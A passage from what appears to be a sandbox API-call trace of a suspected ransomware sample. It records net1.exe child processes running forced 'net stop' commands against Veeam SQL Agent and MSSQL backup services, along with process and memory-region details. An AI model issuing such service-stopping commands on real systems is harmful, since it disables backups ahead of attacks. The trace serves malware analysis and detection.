States.437" [0120.832] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.832] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0120.832] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$VEEAMSQL2008R2 /y" [0120.832] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26fb10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0120.832] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0120.832] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fd68 | out: Buffer=0x26fd68*=0x43c0f0) returned 0x0 [0120.832] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fd68 | out: Buffer=0x26fd68*=0x43c110) returned 0x0 [0120.832] _fileno (_File=0x7fefdba2a80) returned 0 [0120.832] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0120.832] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0120.832] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0120.832] _wcsicmp (_String1="config", _String2="stop") returned -16 [0120.832] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0120.832] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0120.832] _wcsicmp (_String1="file", _String2="stop") returned -13 [0120.832] _wcsicmp (_String1="files", _String2="stop") returned -13 [0120.832] _wcsicmp (_String1="group", _String2="stop") returned -12 [0120.832] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0120.832] _wcsicmp (_String1="help", _String2="stop") returned -11 [0120.832] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0120.833] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0120.833] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0120.833] _wcsicmp (_String1="session", _String2="stop") returned -15 [0120.833] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0120.833] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0120.833] _wcsicmp (_String1="share", _String2="stop") returned -12 [0120.833] _wcsicmp (_String1="start", _String2="stop") returned -14 [0120.833] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0120.833] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0120.833] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0120.833] _wcsicmp (_String1="accounts", _String2="SQLAgent$VEEAMSQL2008R2") returned -18 [0120.833] _wcsicmp (_String1="computer", _String2="SQLAgent$VEEAMSQL2008R2") returned -16 [0120.833] _wcsicmp (_String1="config", _String2="SQLAgent$VEEAMSQL2008R2") returned -16 [0120.833] _wcsicmp (_String1="continue", _String2="SQLAgent$VEEAMSQL2008R2") returned -16 [0120.833] _wcsicmp (_String1="cont", _String2="SQLAgent$VEEAMSQL2008R2") returned -16 [0120.833] _wcsicmp (_String1="file", _String2="SQLAgent$VEEAMSQL2008R2") returned -13 [0120.833] _wcsicmp (_String1="files", _String2="SQLAgent$VEEAMSQL2008R2") returned -13 [0120.833] _wcsicmp (_String1="group", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0120.833] _wcsicmp (_String1="groups", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0120.833] _wcsicmp (_String1="help", _String2="SQLAgent$VEEAMSQL2008R2") returned -11 [0120.833] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$VEEAMSQL2008R2") returned -11 [0120.833] _wcsicmp (_String1="localgroup", _String2="SQLAgent$VEEAMSQL2008R2") returned -7 [0120.833] _wcsicmp (_String1="pause", _String2="SQLAgent$VEEAMSQL2008R2") returned -3 [0120.833] _wcsicmp (_String1="session", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0120.833] _wcsicmp (_String1="sessions", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0120.833] _wcsicmp (_String1="sess", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0120.833] _wcsicmp (_String1="share", _String2="SQLAgent$VEEAMSQL2008R2") returned -9 [0120.833] _wcsicmp (_String1="start", _String2="SQLAgent$VEEAMSQL2008R2") returned 3 [0120.833] _wcsicmp (_String1="stats", _String2="SQLAgent$VEEAMSQL2008R2") returned 3 [0120.833] _wcsicmp (_String1="statistics", _String2="SQLAgent$VEEAMSQL2008R2") returned 3 [0120.833] _wcsicmp (_String1="stop", _String2="SQLAgent$VEEAMSQL2008R2") returned 3 [0120.833] _wcsicmp (_String1="time", _String2="SQLAgent$VEEAMSQL2008R2") returned 1 [0120.833] _wcsicmp (_String1="user", _String2="SQLAgent$VEEAMSQL2008R2") returned 2 [0120.833] _wcsicmp (_String1="users", _String2="SQLAgent$VEEAMSQL2008R2") returned 2 [0120.833] _wcsicmp (_String1="msg", _String2="SQLAgent$VEEAMSQL2008R2") returned -6 [0120.833] _wcsicmp (_String1="messenger", _String2="SQLAgent$VEEAMSQL2008R2") returned -6 [0120.833] _wcsicmp (_String1="receiver", _String2="SQLAgent$VEEAMSQL2008R2") returned -1 [0120.833] _wcsicmp (_String1="rcv", _String2="SQLAgent$VEEAMSQL2008R2") returned -1 [0120.833] _wcsicmp (_String1="netpopup", _String2="SQLAgent$VEEAMSQL2008R2") returned -5 [0120.833] _wcsicmp (_String1="redirector", _String2="SQLAgent$VEEAMSQL2008R2") returned -1 [0120.833] _wcsicmp (_String1="redir", _String2="SQLAgent$VEEAMSQL2008R2") returned -1 [0120.833] _wcsicmp (_String1="rdr", _String2="SQLAgent$VEEAMSQL2008R2") returned -1 [0120.833] _wcsicmp (_String1="workstation", _String2="SQLAgent$VEEAMSQL2008R2") returned 4 [0120.834] _wcsicmp (_String1="work", _String2="SQLAgent$VEEAMSQL2008R2") returned 4 [0120.834] _wcsicmp (_String1="wksta", _String2="SQLAgent$VEEAMSQL2008R2") returned 4 [0120.834] _wcsicmp (_String1="prdr", _String2="SQLAgent$VEEAMSQL2008R2") returned -3 [0120.834] _wcsicmp (_String1="devrdr", _String2="SQLAgent$VEEAMSQL2008R2") returned -15 [0120.834] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$VEEAMSQL2008R2") returned -7 [0120.834] _wcsicmp (_String1="server", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0120.834] _wcsicmp (_String1="svr", _String2="SQLAgent$VEEAMSQL2008R2") returned 5 [0120.834] _wcsicmp (_String1="srv", _String2="SQLAgent$VEEAMSQL2008R2") returned 1 [0120.834] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$VEEAMSQL2008R2") returned -7 [0120.834] _wcsicmp (_String1="alerter", _String2="SQLAgent$VEEAMSQL2008R2") returned -18 [0120.834] _wcsicmp (_String1="netlogon", _String2="SQLAgent$VEEAMSQL2008R2") returned -5 [0120.834] _wcsupr (in: _String="SQLAgent$VEEAMSQL2008R2" | out: _String="SQLAGENT$VEEAMSQL2008R2") returned="SQLAGENT$VEEAMSQL2008R2" [0120.834] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x43ce20 [0120.904] GetServiceKeyNameW (in: hSCManager=0x43ce20, lpDisplayName="SQLAGENT$VEEAMSQL2008R2", lpServiceName=0xffba5750, lpcchBuffer=0x26fc88 | out: lpServiceName="", lpcchBuffer=0x26fc88) returned 0 [0120.906] _wcsicmp (_String1="msg", _String2="SQLAGENT$VEEAMSQL2008R2") returned -6 [0120.906] _wcsicmp (_String1="messenger", _String2="SQLAGENT$VEEAMSQL2008R2") returned -6 [0120.906] _wcsicmp (_String1="receiver", _String2="SQLAGENT$VEEAMSQL2008R2") returned -1 [0120.906] _wcsicmp (_String1="rcv", _String2="SQLAGENT$VEEAMSQL2008R2") returned -1 [0120.906] _wcsicmp (_String1="redirector", _String2="SQLAGENT$VEEAMSQL2008R2") returned -1 [0120.906] _wcsicmp (_String1="redir", _String2="SQLAGENT$VEEAMSQL2008R2") returned -1 [0120.906] _wcsicmp (_String1="rdr", _String2="SQLAGENT$VEEAMSQL2008R2") returned -1 [0120.906] _wcsicmp (_String1="workstation", _String2="SQLAGENT$VEEAMSQL2008R2") returned 4 [0120.906] _wcsicmp (_String1="work", _String2="SQLAGENT$VEEAMSQL2008R2") returned 4 [0120.906] _wcsicmp (_String1="wksta", _String2="SQLAGENT$VEEAMSQL2008R2") returned 4 [0120.906] _wcsicmp (_String1="prdr", _String2="SQLAGENT$VEEAMSQL2008R2") returned -3 [0120.906] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$VEEAMSQL2008R2") returned -15 [0120.906] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$VEEAMSQL2008R2") returned -7 [0120.906] _wcsicmp (_String1="server", _String2="SQLAGENT$VEEAMSQL2008R2") returned -12 [0120.906] _wcsicmp (_String1="svr", _String2="SQLAGENT$VEEAMSQL2008R2") returned 5 [0120.906] _wcsicmp (_String1="srv", _String2="SQLAGENT$VEEAMSQL2008R2") returned 1 [0120.906] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$VEEAMSQL2008R2") returned -7 [0120.906] _wcsicmp (_String1="alerter", _String2="SQLAGENT$VEEAMSQL2008R2") returned -18 [0120.906] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$VEEAMSQL2008R2") returned -5 [0120.906] NetServiceControl (in: servername=0x0, service="SQLAGENT$VEEAMSQL2008R2", opcode=0x0, arg=0x0, bufptr=0x26fc90 | out: bufptr=0x26fc90) returned 0x889 [0120.907] wcscpy_s (in: _Destination=0xffba80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0120.907] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0120.908] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffba5b50, nSize=0x800, Arguments=0xffba7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0120.909] GetFileType (hFile=0xb) returned 0x2 [0120.909] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fb58 | out: lpMode=0x26fb58) returned 1 [0120.909] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffba5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x26fb50, lpReserved=0x0 | out: lpBuffer=0xffba5b50*, lpNumberOfCharsWritten=0x26fb50*=0x1e) returned 1 [0120.909] GetFileType (hFile=0xb) returned 0x2 [0120.909] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fb58 | out: lpMode=0x26fb58) returned 1 [0120.910] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb81efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26fb50, lpReserved=0x0 | out: lpBuffer=0xffb81efc*, lpNumberOfCharsWritten=0x26fb50*=0x2) returned 1 [0120.910] _ultow (in: _Dest=0x889, _Radix=2554816 | out: _Dest=0x889) returned="2185" [0120.910] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffba5b50, nSize=0x800, Arguments=0xffba7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0120.910] GetFileType (hFile=0xb) returned 0x2 [0120.910] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fb58 | out: lpMode=0x26fb58) returned 1 [0120.910] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffba5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x26fb50, lpReserved=0x0 | out: lpBuffer=0xffba5b50*, lpNumberOfCharsWritten=0x26fb50*=0x34) returned 1 [0120.911] GetFileType (hFile=0xb) returned 0x2 [0120.911] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fb58 | out: lpMode=0x26fb58) returned 1 [0120.911] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb81efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26fb50, lpReserved=0x0 | out: lpBuffer=0xffb81efc*, lpNumberOfCharsWritten=0x26fb50*=0x2) returned 1 [0120.911] NetApiBufferFree (Buffer=0x43c0f0) returned 0x0 [0120.911] NetApiBufferFree (Buffer=0x43c110) returned 0x0 [0120.911] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$VEEAMSQL2008R2 /y" [0120.911] exit (_Code=2) Process: id = "371" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x182b000" os_pid = "0x310" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "357" os_parent_pid = "0x990" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2008R2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12943 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12944 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12945 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12946 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 12947 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12948 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12949 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12950 start_va = 0xffb80000 end_va = 0xffbb2fff entry_point = 0xffb80000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 12951 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12952 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12953 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 12954 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12955 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12956 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12957 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 12958 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12959 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12960 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12961 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12988 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12989 start_va = 0x280000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 12990 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 12991 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 12992 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 12993 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 12994 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 12995 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 12996 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 12997 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 12998 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 12999 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 13000 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 13001 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13002 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13003 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 13004 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 13005 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13006 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13026 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 915 os_tid = 0x9ac [0120.793] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xefef0 | out: lpSystemTimeAsFileTime=0xefef0*(dwLowDateTime=0xfd1fd3b0, dwHighDateTime=0x1d48689)) [0120.793] GetCurrentProcessId () returned 0x310 [0120.793] GetCurrentThreadId () returned 0x9ac [0120.793] GetTickCount () returned 0x27d78 [0120.793] QueryPerformanceCounter (in: lpPerformanceCount=0xefef8 | out: lpPerformanceCount=0xefef8*=1816771100000) returned 1 [0120.794] GetModuleHandleW (lpModuleName=0x0) returned 0xffb80000 [0120.794] __set_app_type (_Type=0x1) [0120.794] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffb99c9c) returned 0x0 [0120.794] __getmainargs (in: _Argc=0xffba4780, _Argv=0xffba4790, _Env=0xffba4788, _DoWildCard=0, _StartInfo=0xffba479c | out: _Argc=0xffba4780, _Argv=0xffba4790, _Env=0xffba4788) returned 0 [0120.795] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.795] GetConsoleOutputCP () returned 0x1b5 [0120.810] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffbacec0 | out: lpCPInfo=0xffbacec0) returned 1 [0120.811] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0120.822] sprintf_s (in: _DstBuf=0xefe98, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0120.822] setlocale (category=0, locale=".437") returned="English_United States.437" [0120.825] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.825] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0120.825] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2008R2 /y" [0120.825] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xefc30, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0120.825] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0120.825] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xefe88 | out: Buffer=0xefe88*=0x174d60) returned 0x0 [0120.825] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xefe88 | out: Buffer=0xefe88*=0x17c130) returned 0x0 [0120.825] _fileno (_File=0x7fefdba2a80) returned 0 [0120.825] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0120.826] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0120.826] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0120.826] _wcsicmp (_String1="config", _String2="stop") returned -16 [0120.826] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0120.826] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0120.826] _wcsicmp (_String1="file", _String2="stop") returned -13 [0120.826] _wcsicmp (_String1="files", _String2="stop") returned -13 [0120.826] _wcsicmp (_String1="group", _String2="stop") returned -12 [0120.826] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0120.826] _wcsicmp (_String1="help", _String2="stop") returned -11 [0120.826] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0120.826] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0120.826] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0120.826] _wcsicmp (_String1="session", _String2="stop") returned -15 [0120.826] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0120.826] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0120.826] _wcsicmp (_String1="share", _String2="stop") returned -12 [0120.826] _wcsicmp (_String1="start", _String2="stop") returned -14 [0120.826] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0120.826] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0120.826] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0120.826] _wcsicmp (_String1="accounts", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0120.826] _wcsicmp (_String1="computer", _String2="MSSQL$VEEAMSQL2008R2") returned -10 [0120.826] _wcsicmp (_String1="config", _String2="MSSQL$VEEAMSQL2008R2") returned -10 [0120.826] _wcsicmp (_String1="continue", _String2="MSSQL$VEEAMSQL2008R2") returned -10 [0120.826] _wcsicmp (_String1="cont", _String2="MSSQL$VEEAMSQL2008R2") returned -10 [0120.826] _wcsicmp (_String1="file", _String2="MSSQL$VEEAMSQL2008R2") returned -7 [0120.826] _wcsicmp (_String1="files", _String2="MSSQL$VEEAMSQL2008R2") returned -7 [0120.826] _wcsicmp (_String1="group", _String2="MSSQL$VEEAMSQL2008R2") returned -6 [0120.826] _wcsicmp (_String1="groups", _String2="MSSQL$VEEAMSQL2008R2") returned -6 [0120.826] _wcsicmp (_String1="help", _String2="MSSQL$VEEAMSQL2008R2") returned -5 [0120.827] _wcsicmp (_String1="helpmsg", _String2="MSSQL$VEEAMSQL2008R2") returned -5 [0120.827] _wcsicmp (_String1="localgroup", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0120.827] _wcsicmp (_String1="pause", _String2="MSSQL$VEEAMSQL2008R2") returned 3 [0120.827] _wcsicmp (_String1="session", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0120.827] _wcsicmp (_String1="sessions", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0120.827] _wcsicmp (_String1="sess", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0120.827] _wcsicmp (_String1="share", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0120.827] _wcsicmp (_String1="start", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0120.827] _wcsicmp (_String1="stats", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0120.827] _wcsicmp (_String1="statistics", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0120.827] _wcsicmp (_String1="stop", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0120.827] _wcsicmp (_String1="time", _String2="MSSQL$VEEAMSQL2008R2") returned 7 [0120.827] _wcsicmp (_String1="user", _String2="MSSQL$VEEAMSQL2008R2") returned 8 [0120.827] _wcsicmp (_String1="users", _String2="MSSQL$VEEAMSQL2008R2") returned 8 [0120.827] _wcsicmp (_String1="msg", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0120.827] _wcsicmp (_String1="messenger", _String2="MSSQL$VEEAMSQL2008R2") returned -14 [0120.827] _wcsicmp (_String1="receiver", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0120.827] _wcsicmp (_String1="rcv", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0120.827] _wcsicmp (_String1="netpopup", _String2="MSSQL$VEEAMSQL2008R2") returned 1 [0120.827] _wcsicmp (_String1="redirector", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0120.827] _wcsicmp (_String1="redir", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0120.827] _wcsicmp (_String1="rdr", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0120.827] _wcsicmp (_String1="workstation", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0120.827] _wcsicmp (_String1="work", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0120.827] _wcsicmp (_String1="wksta", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0120.827] _wcsicmp (_String1="prdr", _String2="MSSQL$VEEAMSQL2008R2") returned 3 [0120.827] _wcsicmp (_String1="devrdr", _String2="MSSQL$VEEAMSQL2008R2") returned -9 [0120.827] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0120.827] _wcsicmp (_String1="server", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0120.827] _wcsicmp (_String1="svr", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0120.827] _wcsicmp (_String1="srv", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0120.827] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0120.827] _wcsicmp (_String1="alerter", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0120.827] _wcsicmp (_String1="netlogon", _String2="MSSQL$VEEAMSQL2008R2") returned 1 [0120.827] _wcsupr (in: _String="MSSQL$VEEAMSQL2008R2" | out: _String="MSSQL$VEEAMSQL2008R2") returned="MSSQL$VEEAMSQL2008R2" [0120.828] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x17ce40 [0120.843] GetServiceKeyNameW (in: hSCManager=0x17ce40, 